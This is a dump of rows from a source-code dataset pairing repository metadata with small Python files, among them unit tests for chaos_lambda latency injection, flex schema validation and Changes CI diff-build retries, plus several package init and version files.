self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.INFRA_SPECIFIC_RANK_TYPE_NAME)
# infra name
infra_name = schema.get_field_by_name('Infraspecific Name')
self.assertIsNotNone(infra_name)
self.assertEqual(infra_name.type, 'string')
self.assertFalse(infra_name.required)
biosys = infra_name.get('biosys')
self.assertIsNotNone(biosys)
biosys_type = biosys.get('type')
self.assertEqual(biosys_type, BiosysSchema.INFRA_SPECIFIC_NAME_TYPE_NAME)
# test that we can create a dataset with the returned data
self.verify_inferred_data(received)
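# Summary (added note): each inference test above uploads a file to the
# 'api:infer-dataset' endpoint, checks the inferred dataset type
# (generic / observation / species_observation), asserts per-field type,
# required flag and 'biosys' tag in the returned table schema, and finally
# verifies the result can be posted back to create a new dataset.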
| 44.763224 | 131 | 0.610686 | 3,993 | 35,542 | 5.271225 | 0.075131 | 0.071978 | 0.02328 | 0.026606 | 0.816372 | 0.79485 | 0.771095 | 0.749572 | 0.712847 | 0.683438 | 0 | 0.016165 | 0.288138 | 35,542 | 793 | 132 | 44.819672 | 0.815739 | 0.165438 | 0 | 0.68984 | 0 | 0 | 0.103054 | 0.000833 | 0 | 0 | 0 | 0 | 0.327986 | 1 | 0.032086 | false | 0 | 0.026738 | 0 | 0.065954 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0ac8c36f6e8b9e52b5bb988abdadbb1aea3a0a96 | 140 | py | Python | Data Scientist Career Path/5. Data Manipulation with Pandas/1. Python Lambda Function/4. double or zero.py | myarist/Codecademy | 2ba0f104bc67ab6ef0f8fb869aa12aa02f5f1efb | [
"MIT"
] | 23 | 2021-06-06T15:35:55.000Z | 2022-03-21T06:53:42.000Z | Data Scientist Career Path/5. Data Manipulation with Pandas/1. Python Lambda Function/4. double or zero.py | shivaniverma1/Data-Scientist | f82939a411484311171465591455880c8e354750 | [
"MIT"
] | null | null | null | Data Scientist Career Path/5. Data Manipulation with Pandas/1. Python Lambda Function/4. double or zero.py | shivaniverma1/Data-Scientist | f82939a411484311171465591455880c8e354750 | [
"MIT"
] | 9 | 2021-06-08T01:32:04.000Z | 2022-03-18T15:38:09.000Z | #Write your lambda function here
double_or_zero = lambda num: num * 2 if num > 10 else 0
print(double_or_zero(15))
print(double_or_zero(5)) | 28 | 55 | 0.764286 | 27 | 140 | 3.740741 | 0.62963 | 0.237624 | 0.356436 | 0.336634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058333 | 0.142857 | 140 | 5 | 56 | 28 | 0.783333 | 0.221429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
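# Expected output (added note): 30, since 15 > 10 and is doubled,
# then 0, since 5 is not greater than 10.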
7c15638be80d927ab67a1b4aef2c874b667d134c | 120 | py | Python | popmon/version.py | sbrugman-ing/popmon | a2ede6b7d56772404e9921545b83886e1a9b3806 | [
"MIT"
] | null | null | null | popmon/version.py | sbrugman-ing/popmon | a2ede6b7d56772404e9921545b83886e1a9b3806 | [
"MIT"
] | null | null | null | popmon/version.py | sbrugman-ing/popmon | a2ede6b7d56772404e9921545b83886e1a9b3806 | [
"MIT"
] | null | null | null | """THIS FILE IS AUTO-GENERATED BY SETUP.PY."""
name = "popmon"
version = "0.3.8"
full_version = "0.3.8"
release = True
| 17.142857 | 46 | 0.65 | 21 | 120 | 3.666667 | 0.809524 | 0.207792 | 0.233766 | 0.25974 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059406 | 0.158333 | 120 | 6 | 47 | 20 | 0.70297 | 0.333333 | 0 | 0 | 1 | 0 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7c5cfed5b79c43e29cdf264d93a36a6deb2aaf67 | 127 | py | Python | tests/unittests/broken_functions/invalid_in_anno/main.py | yojagad/azure-functions-python-worker | d5a1587a4ccf56af64f211a64f0b7a3d6cf976c9 | [
"MIT"
] | 1 | 2018-11-28T22:31:27.000Z | 2018-11-28T22:31:27.000Z | tests/unittests/broken_functions/invalid_in_anno/main.py | yojagad/azure-functions-python-worker | d5a1587a4ccf56af64f211a64f0b7a3d6cf976c9 | [
"MIT"
] | null | null | null | tests/unittests/broken_functions/invalid_in_anno/main.py | yojagad/azure-functions-python-worker | d5a1587a4ccf56af64f211a64f0b7a3d6cf976c9 | [
"MIT"
] | 1 | 2018-04-22T18:03:52.000Z | 2018-04-22T18:03:52.000Z | import azure.functions as azf
def main(req: azf.HttpResponse): # should be azf.HttpRequest
return 'trust me, it is OK!'
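# Added note: this fixture lives under broken_functions/invalid_in_anno, so
# the worker is presumably expected to reject it because 'req' is annotated
# as azf.HttpResponse instead of the azf.HttpRequest the trigger binding needs.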
| 21.166667 | 61 | 0.716535 | 20 | 127 | 4.55 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.188976 | 127 | 5 | 62 | 25.4 | 0.883495 | 0.19685 | 0 | 0 | 0 | 0 | 0.19 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
7c9120b70f1c809d76ec44f20faa5c83949fea3b | 77 | py | Python | farmer/ncc/callbacks/__init__.py | tamahassam/farmer | 512c6fcd5dc5aa223a0fad02527d8000a4cc9ab4 | [
"Apache-2.0"
] | 10 | 2019-04-04T07:32:47.000Z | 2021-01-07T00:40:50.000Z | farmer/ncc/callbacks/__init__.py | tamahassam/farmer | 512c6fcd5dc5aa223a0fad02527d8000a4cc9ab4 | [
"Apache-2.0"
] | 59 | 2019-04-18T05:44:31.000Z | 2021-05-02T10:33:02.000Z | farmer/ncc/callbacks/__init__.py | tamahassam/farmer | 512c6fcd5dc5aa223a0fad02527d8000a4cc9ab4 | [
"Apache-2.0"
] | 4 | 2020-01-23T14:01:43.000Z | 2021-02-11T04:16:14.000Z | from .keras_callbacks import *
from .keras_prune import KerasPruningCallback
| 25.666667 | 45 | 0.857143 | 9 | 77 | 7.111111 | 0.666667 | 0.28125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103896 | 77 | 2 | 46 | 38.5 | 0.927536 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7cb2d47d70fd778410377b005cdfdddfe2b3c597 | 5,524 | py | Python | tests/test_delay.py | adhorn/aws-lambda-failure-injection | a6d10af49ea823dc0d24998fe6d5f5544327fc03 | [
"MIT"
] | 74 | 2019-07-17T09:55:09.000Z | 2022-02-04T02:27:59.000Z | tests/test_delay.py | adhorn/aws-lambda-chaos-injection | 294956d50199eee6b42524b75915e6f5b1da93ca | [
"MIT"
] | 16 | 2019-07-17T07:10:51.000Z | 2021-09-28T07:52:38.000Z | tests/test_delay.py | adhorn/aws-lambda-failure-injection | a6d10af49ea823dc0d24998fe6d5f5544327fc03 | [
"MIT"
] | 9 | 2019-08-20T01:47:55.000Z | 2022-01-30T17:33:48.000Z | from chaos_lambda import inject_fault
from . import TestBase, ignore_warnings
import unittest
import logging
import pytest
import sys
@inject_fault
def handler(event, context):
return {
'statusCode': 200,
'body': 'Hello from Lambda!'
}
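# Added note: inject_fault reads a JSON config registered in each test below
# under the key 'test.config' (presumably backed by the harness's parameter
# store): 'delay' is latency in ms, 'rate' the injection probability,
# 'fault_type' selects the latency fault, and 'is_enabled' toggles injection.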
class TestDelayMethods(TestBase):
@pytest.fixture(autouse=True)
def inject_fixtures(self, caplog):
self._caplog = caplog
@ignore_warnings
def _setTestUp(self, subfolder):
class_name = self.__class__.__name__
self._setUp(class_name, subfolder)
config = "{ \"delay\": 400, \"is_enabled\": true, \"error_code\": 404, \"exception_msg\": \"This is chaos\", \"rate\": 1, \"fault_type\": \"latency\"}"
self._create_params(name='test.config', value=config)
@ignore_warnings
def test_get_delay(self):
method_name = sys._getframe().f_code.co_name
self._setTestUp(method_name)
with self._caplog.at_level(logging.DEBUG, logger="chaos_lambda"):
response = handler('foo', 'bar')
assert (
'Injecting 400 ms of delay with a rate of 1' in self._caplog.text
)
assert (
'sleeping now' in self._caplog.text
)
self.assertEqual(
str(response), "{'statusCode': 200, 'body': 'Hello from Lambda!'}")
class TestDelayMethodsnotEnabled(TestBase):
@pytest.fixture(autouse=True)
def inject_fixtures(self, caplog):
self._caplog = caplog
@ignore_warnings
def _setTestUp(self, subfolder):
class_name = self.__class__.__name__
self._setUp(class_name, subfolder)
config = "{ \"delay\": 400, \"is_enabled\": false, \"error_code\": 404, \"exception_msg\": \"This is chaos\", \"rate\": 1, \"fault_type\": \"latency\"}"
self._create_params(name='test.config', value=config)
@ignore_warnings
def test_delay_not_enabled(self):
method_name = sys._getframe().f_code.co_name
self._setTestUp(method_name)
with self._caplog.at_level(logging.DEBUG, logger="chaos_lambda"):
response = handler('foo', 'bar')
assert (
len(self._caplog.text) == 0
)
assert (
'sleeping now' not in self._caplog.text
)
self.assertEqual(
str(response), "{'statusCode': 200, 'body': 'Hello from Lambda!'}")
class TestDelayMethodslowrate(TestBase):
@pytest.fixture(autouse=True)
def inject_fixtures(self, caplog):
self._caplog = caplog
@ignore_warnings
def _setTestUp(self, subfolder):
class_name = self.__class__.__name__
self._setUp(class_name, subfolder)
config = "{ \"delay\": 400, \"is_enabled\": true, \"error_code\": 404, \"exception_msg\": \"This is chaos\", \"rate\": 0.000001, \"fault_type\": \"latency\"}"
self._create_params(name='test.config', value=config)
@ignore_warnings
def test_delay_low_rate(self):
method_name = sys._getframe().f_code.co_name
self._setTestUp(method_name)
with self._caplog.at_level(logging.DEBUG, logger="chaos_lambda"):
response = handler('foo', 'bar')
assert (
'sleeping now' not in self._caplog.text
)
self.assertEqual(
str(response), "{'statusCode': 200, 'body': 'Hello from Lambda!'}")
class TestDelayEnabledNoDelay(TestBase):
@pytest.fixture(autouse=True)
def inject_fixtures(self, caplog):
self._caplog = caplog
@ignore_warnings
def _setTestUp(self, subfolder):
class_name = self.__class__.__name__
self._setUp(class_name, subfolder)
config = "{ \"delay\": 0, \"is_enabled\": true, \"error_code\": 404, \"exception_msg\": \"This is chaos\", \"rate\": 0.000001, \"fault_type\": \"latency\"}"
self._create_params(name='test.config', value=config)
@ignore_warnings
def test_delay_zero(self):
method_name = sys._getframe().f_code.co_name
self._setTestUp(method_name)
with self._caplog.at_level(logging.DEBUG, logger="chaos_lambda"):
response = handler('foo', 'bar')
assert (
'sleeping now' not in self._caplog.text
)
self.assertEqual(
str(response), "{'statusCode': 200, 'body': 'Hello from Lambda!'}")
class TestDelayEnabledDelayNotInt(TestBase):
@pytest.fixture(autouse=True)
def inject_fixtures(self, caplog):
self._caplog = caplog
@ignore_warnings
def _setTestUp(self, subfolder):
class_name = self.__class__.__name__
self._setUp(class_name, subfolder)
config = "{ \"delay\": \"boo\", \"is_enabled\": true, \"error_code\": 404, \"exception_msg\": \"This is chaos\", \"rate\": 0.000001, \"fault_type\": \"latency\"}"
self._create_params(name='test.config', value=config)
@ignore_warnings
def test_delay_not_int(self):
method_name = sys._getframe().f_code.co_name
self._setTestUp(method_name)
with self._caplog.at_level(logging.DEBUG, logger="chaos_lambda"):
response = handler('foo', 'bar')
assert (
'sleeping now' not in self._caplog.text
)
assert (
'Parameter delay is no valid int' in self._caplog.text
)
self.assertEqual(
str(response), "{'statusCode': 200, 'body': 'Hello from Lambda!'}")
if __name__ == '__main__':
unittest.main()
| 34.962025 | 170 | 0.613505 | 619 | 5,524 | 5.171244 | 0.153473 | 0.071853 | 0.053108 | 0.034989 | 0.870665 | 0.861918 | 0.861918 | 0.850359 | 0.850359 | 0.850359 | 0 | 0.017137 | 0.25 | 5,524 | 157 | 171 | 35.184713 | 0.755491 | 0 | 0 | 0.679688 | 0 | 0 | 0.145004 | 0 | 0 | 0 | 0 | 0 | 0.101563 | 1 | 0.125 | false | 0 | 0.046875 | 0.007813 | 0.21875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6b1c34899520bddf6698b7e6ad21f752536d0d87 | 4,803 | py | Python | tests/loading/definition/schema/test_min_and_max_properties.py | maroux/flex | dfd7c6d79d065d7ce1b0c799e51e9bb5292612b2 | [
"MIT"
] | 160 | 2015-01-15T05:36:44.000Z | 2021-08-04T00:43:54.000Z | tests/loading/definition/schema/test_min_and_max_properties.py | maroux/flex | dfd7c6d79d065d7ce1b0c799e51e9bb5292612b2 | [
"MIT"
] | 151 | 2015-01-20T16:45:36.000Z | 2022-02-23T21:07:58.000Z | tests/loading/definition/schema/test_min_and_max_properties.py | maroux/flex | dfd7c6d79d065d7ce1b0c799e51e9bb5292612b2 | [
"MIT"
] | 90 | 2015-01-20T11:19:36.000Z | 2021-08-03T08:58:18.000Z | import pytest
from flex.constants import (
OBJECT,
STRING,
INTEGER,
)
from flex.error_messages import MESSAGES
from flex.exceptions import ValidationError
from flex.loading.definitions.schema import schema_validator
from tests.utils import (
assert_path_not_in_errors,
assert_message_in_errors,
)
def test_min_and_max_properties_are_not_required():
try:
schema_validator({})
except ValidationError as err:
errors = err.detail
else:
errors = {}
assert_path_not_in_errors('minProperties', errors)
assert_path_not_in_errors('maxProperties', errors)
@pytest.mark.parametrize(
'value',
('abc', [1, 2], None, {'a': 1}, True, False, 1.1),
)
def test_min_properties_for_invalid_types(value):
"""
Ensure that the value of `minProperties` is validated to be numeric.
"""
with pytest.raises(ValidationError) as err:
schema_validator({'minProperties': value})
assert_message_in_errors(
MESSAGES['type']['invalid'],
err.value.detail,
'minProperties.type',
)
@pytest.mark.parametrize(
'type_',
(
STRING,
(STRING, INTEGER),
),
)
def test_type_validation_for_min_properties_for_invalid_types(type_):
with pytest.raises(ValidationError) as err:
schema_validator({
'minProperties': 5,
'type': type_,
})
assert_message_in_errors(
MESSAGES['type']['invalid_type_for_min_properties'],
err.value.detail,
'type',
)
@pytest.mark.parametrize(
'type_',
(
OBJECT,
(STRING, OBJECT, INTEGER),
),
)
def test_type_validation_for_min_properties_for_valid_types(type_):
try:
schema_validator({
'minProperties': 5,
'type': type_,
})
except ValidationError as err:
errors = err.detail
else:
errors = {}
assert_path_not_in_errors('type', errors)
@pytest.mark.parametrize(
'value',
('abc', [1, 2], None, {'a': 1}, True, False, 1.1),
)
def test_max_properties_for_invalid_types(value):
"""
Ensure that the value of `maxProperties` is validated to be numeric.
"""
with pytest.raises(ValidationError) as err:
schema_validator({'maxProperties': value})
assert_message_in_errors(
MESSAGES['type']['invalid'],
err.value.detail,
'maxProperties.type',
)
@pytest.mark.parametrize(
'type_',
(
STRING,
(STRING, INTEGER),
),
)
def test_type_validation_for_max_properties_for_invalid_types(type_):
with pytest.raises(ValidationError) as err:
schema_validator({
'maxProperties': 5,
'type': type_,
})
assert_message_in_errors(
MESSAGES['type']['invalid_type_for_max_properties'],
err.value.detail,
'type',
)
@pytest.mark.parametrize(
'type_',
(
OBJECT,
(STRING, OBJECT, INTEGER),
),
)
def test_type_validation_for_max_properties_for_valid_types(type_):
try:
schema_validator({
'maxProperties': 5,
'type': type_,
})
except ValidationError as err:
errors = err.detail
else:
errors = {}
assert_path_not_in_errors('type', errors)
def test_min_properties_must_be_greater_than_0():
"""
    Ensure that the value of `minProperties` is validated to be non-negative.
"""
with pytest.raises(ValidationError) as err:
schema_validator({'minProperties': -1})
assert_message_in_errors(
MESSAGES['minimum']['invalid'],
err.value.detail,
'minProperties.minimum',
)
def test_max_properties_must_be_greater_than_0():
"""
    Ensure that the value of `maxProperties` is validated to be non-negative.
"""
with pytest.raises(ValidationError) as err:
schema_validator({'maxProperties': -1})
assert_message_in_errors(
MESSAGES['minimum']['invalid'],
err.value.detail,
'maxProperties.minimum',
)
def test_min_and_max_properties_with_valid_values():
try:
schema_validator({
'minProperties': 4,
'maxProperties': 8,
})
except ValidationError as err:
errors = err.detail
else:
errors = {}
assert_path_not_in_errors('minProperties', errors)
assert_path_not_in_errors('maxProperties', errors)
def test_max_properties_must_be_greater_than_or_equal_to_min_properties():
with pytest.raises(ValidationError) as err:
schema_validator({
'minProperties': 5,
'maxProperties': 4,
})
assert_message_in_errors(
MESSAGES['max_properties']['must_be_greater_than_min_properties'],
err.value.detail,
'maxProperties',
)
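# For reference (added sketch), a minimal schema that satisfies all of the
# validators exercised above should raise no ValidationError:
# schema_validator({'type': OBJECT, 'minProperties': 1, 'maxProperties': 10})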
| 23.429268 | 74 | 0.634812 | 525 | 4,803 | 5.48 | 0.148571 | 0.04171 | 0.076469 | 0.058394 | 0.859576 | 0.811609 | 0.77407 | 0.77407 | 0.735488 | 0.717762 | 0 | 0.006154 | 0.255674 | 4,803 | 204 | 75 | 23.544118 | 0.798601 | 0.057256 | 0 | 0.649682 | 0 | 0 | 0.120439 | 0.031117 | 0 | 0 | 0 | 0 | 0.095541 | 1 | 0.070064 | false | 0 | 0.038217 | 0 | 0.10828 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6b39c39456f7cc0317670f9afbae116f6c98cd85 | 80 | py | Python | app/main/__init__.py | jakhax/esp9266_rfid_lock | e9c25628a023c8d6005a136e240ca1a36589fd36 | [
"MIT"
] | 2 | 2020-11-10T09:16:21.000Z | 2021-12-15T07:27:17.000Z | app/main/__init__.py | jakhax/consecutive_normal_punches | e9c25628a023c8d6005a136e240ca1a36589fd36 | [
"MIT"
] | null | null | null | app/main/__init__.py | jakhax/consecutive_normal_punches | e9c25628a023c8d6005a136e240ca1a36589fd36 | [
"MIT"
] | null | null | null | from flask import Blueprint
main=Blueprint("main",__name__)
from . import views | 20 | 31 | 0.8 | 11 | 80 | 5.454545 | 0.636364 | 0.433333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1125 | 80 | 4 | 32 | 20 | 0.84507 | 0 | 0 | 0 | 0 | 0 | 0.049383 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
865365ff6807936a1cfc53592eb7bd9714770c0c | 87 | py | Python | twelve/unsupervised/__init__.py | DSE512/twelve | 89ced1db394e5689c617edb4c819aec4138c48c3 | [
"BSD-3-Clause"
] | 3 | 2021-02-09T15:31:53.000Z | 2021-10-31T15:46:51.000Z | twelve/unsupervised/__init__.py | yngtodd/twelve | 89ced1db394e5689c617edb4c819aec4138c48c3 | [
"BSD-3-Clause"
] | null | null | null | twelve/unsupervised/__init__.py | yngtodd/twelve | 89ced1db394e5689c617edb4c819aec4138c48c3 | [
"BSD-3-Clause"
] | 1 | 2021-12-16T15:33:50.000Z | 2021-12-16T15:33:50.000Z | from .kmeans import Kmeans, kmeans_save
from .parallel_kmeans import KmeansDistributed
| 29 | 46 | 0.862069 | 11 | 87 | 6.636364 | 0.545455 | 0.328767 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 87 | 2 | 47 | 43.5 | 0.935897 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
866118ea8c8a639f4d41f9fa1c66cc8f77cf8e29 | 27 | py | Python | test_python_import_issue/pacx/j.py | zengmeng1094/test-python | 79aa30789c2bb8700f660a4d6b13f06960e169e5 | [
"MIT"
] | null | null | null | test_python_import_issue/pacx/j.py | zengmeng1094/test-python | 79aa30789c2bb8700f660a4d6b13f06960e169e5 | [
"MIT"
] | null | null | null | test_python_import_issue/pacx/j.py | zengmeng1094/test-python | 79aa30789c2bb8700f660a4d6b13f06960e169e5 | [
"MIT"
] | null | null | null | def add():
print('add') | 13.5 | 16 | 0.518519 | 4 | 27 | 3.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 27 | 2 | 16 | 13.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0.107143 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
8676f34479e7f82fa07f938c4cb293147fc7bc93 | 15,831 | py | Python | tests/changes/api/test_diff_build_retry.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 443 | 2015-01-03T16:28:39.000Z | 2021-04-26T16:39:46.000Z | tests/changes/api/test_diff_build_retry.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 12 | 2015-07-30T19:07:16.000Z | 2016-11-07T23:11:21.000Z | tests/changes/api/test_diff_build_retry.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 47 | 2015-01-09T10:04:00.000Z | 2020-11-18T17:58:19.000Z | import mock
import yaml
from datetime import datetime
from changes.config import db
from changes.constants import Cause, Result, SelectiveTestingPolicy, Status
from changes.models.build import Build
from changes.models.job import Job
from changes.models.project import ProjectOption
from changes.testutils import APITestCase, SAMPLE_DIFF, SAMPLE_DIFF_BYTES
from changes.vcs.base import CommandError, InvalidDiffError, RevisionResult, UnknownRevision, Vcs
class DiffBuildRetryTest(APITestCase):
def get_fake_vcs(self, log_results=None):
def _log_results(parent=None, branch=None, offset=0, limit=1):
assert not branch
return iter([
RevisionResult(
id='a' * 40,
message='hello world',
author='Foo <foo@example.com>',
author_date=datetime.utcnow(),
)])
if log_results is None:
log_results = _log_results
# Fake having a VCS and stub the returned commit log
fake_vcs = mock.Mock(spec=Vcs)
fake_vcs.read_file.side_effect = CommandError(
cmd="test command", retcode=128)
fake_vcs.exists.return_value = True
fake_vcs.log.side_effect = UnknownRevision(
cmd="test command", retcode=128)
fake_vcs.export.side_effect = UnknownRevision(
cmd="test command", retcode=128)
fake_vcs.get_patch_hash.return_value = 'a' * 40
def fake_update():
# this simulates the effect of calling update() on a repo,
# mainly that `export` and `log` now works.
fake_vcs.log.side_effect = log_results
fake_vcs.export.side_effect = None
fake_vcs.export.return_value = SAMPLE_DIFF_BYTES
fake_vcs.update.side_effect = fake_update
return fake_vcs
def setUp(self):
super(DiffBuildRetryTest, self).setUp()
diff_id = 123
self.project = self.create_project()
self.patch = self.create_patch(
repository_id=self.project.repository_id,
diff=SAMPLE_DIFF
)
self.source = self.create_source(
self.project,
patch=self.patch,
)
self.diff = self.create_diff(diff_id, source=self.source)
self.create_plan(self.project)
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_simple(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed,
selective_testing_policy=SelectiveTestingPolicy.enabled,
)
job = self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 1
new_build = Build.query.get(data[0]['id'])
assert new_build.id != build.id
assert new_build.collection_id != build.collection_id
assert new_build.project_id == self.project.id
assert new_build.cause == Cause.retry
assert new_build.author_id == build.author_id
assert new_build.source_id == build.source_id
assert new_build.label == build.label
assert new_build.message == build.message
assert new_build.target == build.target
assert new_build.selective_testing_policy == build.selective_testing_policy
(new_job,) = list(Job.query.filter(
Job.build_id == new_build.id,
))
assert new_job.id != job.id
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_simple_multiple_diffs(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
self.create_diff(124, source=self.source)
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
job = self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 1
new_build = Build.query.get(data[0]['id'])
assert new_build.id != build.id
assert new_build.collection_id != build.collection_id
assert new_build.project_id == build.project_id
assert new_build.source_id == build.source_id
(new_job,) = list(Job.query.filter(
Job.build_id == new_build.id,
))
assert new_job.id != job.id
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_simple_passed(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.passed
)
self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 0
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_simple_in_progress(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
build = self.create_build(
project=self.project,
source=self.source,
status=Status.in_progress,
result=Result.failed
)
self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 0
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_multiple_builds_same_project(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
self.create_build(
project=self.project,
source=self.source
)
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
job = self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 1
new_build = Build.query.get(data[0]['id'])
assert new_build.id != build.id
assert new_build.collection_id != build.collection_id
assert new_build.project_id == self.project.id
assert new_build.source_id == build.source_id
(new_job,) = list(Job.query.filter(
Job.build_id == new_build.id,
))
assert new_job.id != job.id
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_multiple_builds_different_projects(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
self.create_build(
project=self.project,
source=self.source
)
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
job = self.create_job(build=build)
project2 = self.create_project(
repository=self.project.repository,
name="project 2"
)
build2 = self.create_build(
project=project2,
source=self.source,
status=Status.finished,
result=Result.passed
)
self.create_job(build=build2)
self.create_plan(project2)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 1
new_build = Build.query.get(data[0]['id'])
assert new_build.id != build.id
assert new_build.collection_id != build.collection_id
assert new_build.project_id == self.project.id
assert new_build.source_id == build.source_id
